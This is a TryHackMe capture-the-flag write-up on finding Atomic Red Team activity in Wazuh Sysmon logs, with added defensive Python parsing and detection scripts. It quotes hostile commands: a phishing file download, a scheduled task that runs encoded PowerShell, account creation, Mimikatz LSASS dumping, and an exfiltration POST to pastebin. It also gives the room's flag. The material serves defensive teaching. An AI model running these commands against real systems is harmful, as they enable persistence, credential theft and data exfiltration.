![[mm0.png]]

# TryHackMe Log Analysis Challenge

### Overview

This is a TryHackMe Log Analysis challenge in which we play the role of an analyst working for SwiftSpend Finance who is tasked with analyzing Sysmon logs within the *Wazuh* SIEM in order to confirm proper visibility for the company. The Security team at SwiftSpend is running various tests to emulate threat actor behavior, and our goal is to comb through the logs until we find everything that we need.

Once we log into the Wazuh instance, we navigate to the *security events* page and run the *Monday_Monitor* query after configuring the date and time range to April 29th, 2024 between the hours of 12:00 and 20:00.

### Room

![[mm1.png]]

**Initial access was established using a downloaded file. What is the file name saved on the host?**

Let's start off by adding some more columns to the default view using some potentially interesting fields. You can do this by hovering over a specific field and clicking the + button, which automatically adds the field as a column.

- `rule.mitre.technique`
- `data.win.eventdata.user`
- `data.win.eventdata.image`
- `data.win.eventdata.commandLine`

These were the fields that I decided to add to the list of events just to enhance my view and to make it easier to discern the activity without needing to constantly expand each individual event to get more context. Feel free to add any additional fields that you find interesting to your view; the more context, the better!

Next I sorted by time so that we start with the earliest events in the timeline and can work forwards from the initial activity.

![[mm2.png]]

As we can see at the very beginning, there appears to be a system with the name *ATOMIC*, which tells me that we will be investigating activity related to the Atomic Red Team tool. This suspicion is quickly confirmed, but we will get to that later.
Our first goal in this analysis is to look for signs of [Initial Access](https://attack.mitre.org/tactics/TA0001/), specifically in regard to downloaded files. Now we need to start combing through the logs to see if we can find any signs of a file download. My first thought was simply to CTRL+F for "http://" and, lo and behold, we get a couple of results.

![[mm3.png]]

Homing in on this event, we can see a PowerShell command being run which sets a variable, in this case **$url**, to point to a specific .xlsm file. It then attempts to download the file using the $url variable and save it to the machine's TEMP directory with the very not-obvious name of `PhishingAttachment.xlsm`. This is definitely a good indicator of an initial access attempt via a file download, so let's go ahead and try the first answer with the original name of the .xlsm file.

**What is the full command run to create a scheduled task?**

Next we are tasked with finding evidence of a scheduled task being created and with providing the command in its entirety. If we scroll down just a bit from the initial PowerShell download command, we see evidence of `schtasks.exe` being run and the full command alongside it.

![[mm4.png]]

Let's go ahead and copy the full command starting with `\"cmd.exe\"` and drop that into the answer box to see if we got it right.

**What time is the scheduled task meant to run?**

Looking at the command in full we can see exactly what it is attempting to do and that it is obviously part of an Atomic Red Team test, specifically testing MITRE ATT&CK sub-technique T1053.005, Scheduled Task/Job: Scheduled Task. You can read through the Atomic Red Team GitHub repository entry for this sub-technique if you would like to know more about exactly what is happening.
https://attack.mitre.org/techniques/T1053/005/

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md

```
\"cmd.exe\" /c \"reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 12:34\"
```

For now, however, we need to know what time the created scheduled task is meant to run. We can determine this from the `/st` (*start time*) flag at the end of the command. We see it is set for 12:34, so once again we will see if this happens to be the correct answer by dropping it into the answer box.

**What was encoded?**

Contained within the command from the previous question, we can see a base64 encoded command being run, along with the base64 string itself, which we can decode using [CyberChef](https://gchq.github.io/CyberChef/) to discover what it contains. From this additional information we can make a pretty good determination that this specific command was the result of Test #7 of the Atomic Red Team's arsenal for this sub-technique.

`cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=`

![[mm5.png]]

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md#atomic-test-7---scheduled-task-executing-base64-encoded-commands-from-registry

We are nearing the end of this investigation, only a few more questions to go!

**What password was set for the new user account?**

Let's continue to scroll through the events to see if we can't find evidence of a new user account being created along with a password being set.
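The scheduled-task command and base64 string discussed above can be taken apart programmatically instead of by hand. The following Python snippet is an added example, not part of the original write-up or of Wazuh: it takes the `data.win.eventdata.commandLine` value exactly as the Wazuh UI renders it (still JSON-escaped, which is why the quotes and backslashes are doubled), unescapes it, and extracts the task name, schedule and `/st` start time, the registry value staged by `reg add`, and the decoded base64 payload. It also checks that the task action (`/TR`) actually reads that registry value back through `Get-ItemProperty` and `FromBase64String`, so the decoded string is what the task will run. The command string is the one quoted above; the function names are mine.

```python
import base64
import binascii
import json
import re

# The data.win.eventdata.commandLine value exactly as the Wazuh UI shows it,
# i.e. still JSON-escaped. This is the command quoted in the write-up above.
RAW_COMMANDLINE = (
    r'\"cmd.exe\" /c \"reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ '
    r'/d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F '
    r'/TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe '
    r'-Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::'
    r'FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005)'
    r'.test)))\" /sc daily /st 12:34\"'
)


def unescape_log_field(raw: str) -> str:
    """Undo the JSON escaping the SIEM applied when rendering the field."""
    return json.loads('"' + raw + '"')


def analyze_schtasks_event(raw: str) -> dict:
    """Extract task metadata and the payload the task will execute."""
    cmd = unescape_log_field(raw)
    result = {}

    task = re.search(r'/TN\s+"?([^"\s]+)', cmd, re.I)
    sched = re.search(r'/SC\s+(\S+)', cmd, re.I)
    start = re.search(r'/ST\s+(\d{1,2}:\d{2})', cmd, re.I)
    result["task_name"] = task.group(1) if task else None
    result["schedule"] = sched.group(1) if sched else None
    result["start_time"] = start.group(1) if start else None

    # The payload is staged in the registry first, then read back by the task action.
    reg = re.search(r'reg add (\S+) /v (\S+) /t (\S+) /d (\S+)', cmd, re.I)
    if reg:
        key, value, rtype, data = reg.groups()
        result.update({"registry_key": key, "registry_value": value,
                       "registry_type": rtype, "registry_data": data})
        try:
            result["decoded_payload"] = base64.b64decode(data, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            # Not valid base64 / not text: report the raw data instead of guessing.
            result["decoded_payload"] = None

    # Confirm the /TR action dereferences that registry value, so the decoded
    # string is what runs at the start time rather than an unrelated blob.
    action = re.search(r'/TR\s+"(.*)"\s+/SC', cmd, re.I | re.S)
    action_cmd = action.group(1) if action else ""
    result["task_reads_registry"] = bool(
        reg and "Get-ItemProperty" in action_cmd
        and "FromBase64String" in action_cmd
        and reg.group(2) in action_cmd
    )
    return result


if __name__ == "__main__":
    for key, val in analyze_schtasks_event(RAW_COMMANDLINE).items():
        print(f"{key:>20}: {val}")
```

The same unescape-then-parse approach works for any field copied out of the Wazuh event viewer; copying the escaped form into CyberChef's "From Base64" recipe without unescaping first is a common reason a decode comes back as garbage.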
The standard syntax on Windows to create a new user and set a password for that user is as follows:

```
net user USERNAME PASSWORD
```

If we know this, we can pretty easily discern any instances of this occurring. In fact, we come across an example fairly quickly and are able to see a new account with the name "guest" being created along with a password being set. Let's go ahead and see if that is the correct answer.

![[mm6.png]]

**What is the name of the .exe that was used to dump credentials?**

We're in the home stretch! Our next step is to look for evidence of credential dumping.

![[mm7.png]]

Boom. If we scroll down we can see what appears to be *Mimikatz* activity, although the Mimikatz executable appears to have been renamed to `memotech.exe`. Mimikatz is an extremely powerful and very well-known credential dumping/credential extraction tool, and it is very common to see it employed in these types of scenarios. `sekurlsa::minidump` is a specific Mimikatz command that makes it read from an LSASS minidump file; in this instance, we can see it pointed at the `lsass.DMP` file, from which it then attempts to extract passwords. You can read more about Mimikatz and its capabilities from the entry in HackTricks.

https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz

**Data was exfiltrated from the host. What was the flag that was part of the data?**

Finally! The last question...for now. Knowing that evidence of exfiltration will likely be towards the very end of the activity, let's scroll a bit further down and see if we can't find some evidence of exfiltration along with the needed flag.

![[mm8.png]]

And there we have it. Another PowerShell command being run that we can analyze and determine is making POST requests to `pastebin.com` with the goal of uploading confidential stolen data, along with some additional data that bears a striking resemblance to the format of a TryHackMe flag.
```
\"powershell.exe\" & {$apiKey = \\\"\"6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0\\\"\"
$content = \\\"\"secrets, api keys, passwords, THM{M0N1T0R_1$_1N_3FF3CT}, confidential, private, wall, redeem...\\\"\"
$url = \\\"\"https://pastebin.com/api/api_post.php\\\"\"
$postData = @{
    api_dev_key = $apiKey
    api_option = \\\"\"paste\\\"\"
    api_paste_code = $content
}
$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData
Write-Host \\\"\"Your paste URL: $response\\\"\"}
```

And with that out of the way the room is completed and we are on to the next. I will see you there! Take care.
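The manual hunt walked through above (CTRL+F for "http://", then scanning for `schtasks`, `net user`, the renamed Mimikatz binary and the pastebin POST) can be turned into a repeatable triage pass. The Python script below is an added example, not part of the original write-up or of Wazuh: it runs a handful of regex rules over constructed Sysmon process-creation records whose field names mirror the `data.win.eventdata.*` columns added to the view earlier (the values are made up for the example, not the room's real log entries; the `attacker.invalid` URL and the `C0nstructedP@ss` password are placeholders), and reports which stage each event matches together with the artefact the corresponding question asks for (saved file name, task name, account name, renamed binary, flag). The rules match on command-line content rather than on the image name, which is what catches Mimikatz after it has been renamed. One caveat for the account rule: `net user NAME PASSWORD /add` creates the account, whereas the same line without `/add` resets the password of an account that already exists, so the rule fires on both and the analyst should check which one it was.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records, flattened the way
# Wazuh exposes them in the data.win.eventdata.* columns. They mirror the stages
# of the room but are made up for this example, not the real log entries.
EVENTS = [
    {"ts": "2024-04-29T12:05:10", "user": r"ATOMIC\user",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "commandLine": r"powershell.exe -Command $url='http://attacker.invalid/phish.xlsm'; "
                    r"(New-Object Net.WebClient).DownloadFile($url, $env:TEMP + '\PhishingAttachment.xlsm')"},
    {"ts": "2024-04-29T12:07:44", "user": r"ATOMIC\user", "image": r"C:\Windows\System32\schtasks.exe",
     "commandLine": r'schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min powershell.exe" /sc daily /st 12:34'},
    {"ts": "2024-04-29T12:09:01", "user": r"ATOMIC\user", "image": r"C:\Windows\System32\net.exe",
     "commandLine": r"net user guest C0nstructedP@ss /add"},  # placeholder password
    {"ts": "2024-04-29T12:15:37", "user": r"ATOMIC\user", "image": r"C:\Users\Public\memotech.exe",
     "commandLine": r'memotech.exe "sekurlsa::minidump C:\Users\Public\lsass.DMP" exit'},
    {"ts": "2024-04-29T12:20:55", "user": r"ATOMIC\user",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "commandLine": r"powershell.exe & {$content = 'secrets, THM{M0N1T0R_1$_1N_3FF3CT}, confidential'; "
                    r"Invoke-RestMethod -Uri 'https://pastebin.com/api/api_post.php' -Method Post "
                    r"-Body @{api_dev_key='<constructed-key>'; api_option='paste'; api_paste_code=$content}}"},
    {"ts": "2024-04-29T12:21:30", "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Windows\System32\svchost.exe",
     "commandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},  # benign noise
]

# Each rule: (name, ATT&CK technique, regexes that must ALL match the command line).
RULES = [
    ("PowerShell download cradle", "T1105",
     [r"https?://", r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer"]),
    ("Scheduled task created", "T1053.005", [r"\bschtasks(?:\.exe)?\b.*?/create\b"]),
    ("Local account created with password", "T1136.001",
     [r"\bnet1?(?:\.exe)?\s+user\s+(?!/)\S+\s+(?!/)\S+"]),
    ("Mimikatz-style LSASS access", "T1003.001", [r"sekurlsa::|lsadump::|lsass\.dmp"]),
    ("POST to paste site", "T1567",
     [r"pastebin\.com", r"-Method\s+Post|Invoke-RestMethod|Invoke-WebRequest"]),
]
COMPILED = [(name, tech, [re.compile(p, re.I) for p in pats]) for name, tech, pats in RULES]


def enrich(rule: str, cmd: str) -> dict:
    """Pull out the artefact each room question asks for from a matching command line."""
    if rule == "PowerShell download cradle":
        url = re.search(r"https?://[^\s'\"]+", cmd)
        files = re.findall(r"[\w-]+\.(?:xlsm|xlsx|docm|docx|zip|iso)\b", cmd, re.I)
        return {"url": url.group(0) if url else None, "files": files}
    if rule == "Scheduled task created":
        task = re.search(r'/TN\s+"?([^"\s]+)', cmd, re.I)
        start = re.search(r"/ST\s+(\d{1,2}:\d{2})", cmd, re.I)
        return {"task": task.group(1) if task else None,
                "start_time": start.group(1) if start else None}
    if rule == "Local account created with password":
        m = re.search(r"\bnet1?(?:\.exe)?\s+user\s+(?!/)(\S+)", cmd, re.I)
        return {"account": m.group(1) if m else None}
    if rule == "POST to paste site":
        host = re.search(r"https?://([^/\s'\"]+)", cmd)
        return {"host": host.group(1) if host else None,
                "flags": re.findall(r"THM\{[^}]*\}", cmd)}
    return {}


def triage(events: list) -> list:
    """Run every rule over every event and return findings in timeline order."""
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        cmd = ev["commandLine"]
        for name, technique, patterns in COMPILED:
            if all(p.search(cmd) for p in patterns):
                findings.append({"ts": ev["ts"], "user": ev["user"], "technique": technique,
                                 "rule": name, "image": ev["image"].rsplit("\\", 1)[-1],
                                 "detail": enrich(name, cmd)})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f['ts']}  {f['technique']:<10} {f['rule']:<38} {f['image']:<16} {f['detail']}")
```

The same patterns translate fairly directly into Wazuh custom rules or Sigma rules keyed on `data.win.eventdata.commandLine`; the point of prototyping them in a script first is to run them against the exported events and confirm they fire on exactly the five stages and not on the surrounding noise.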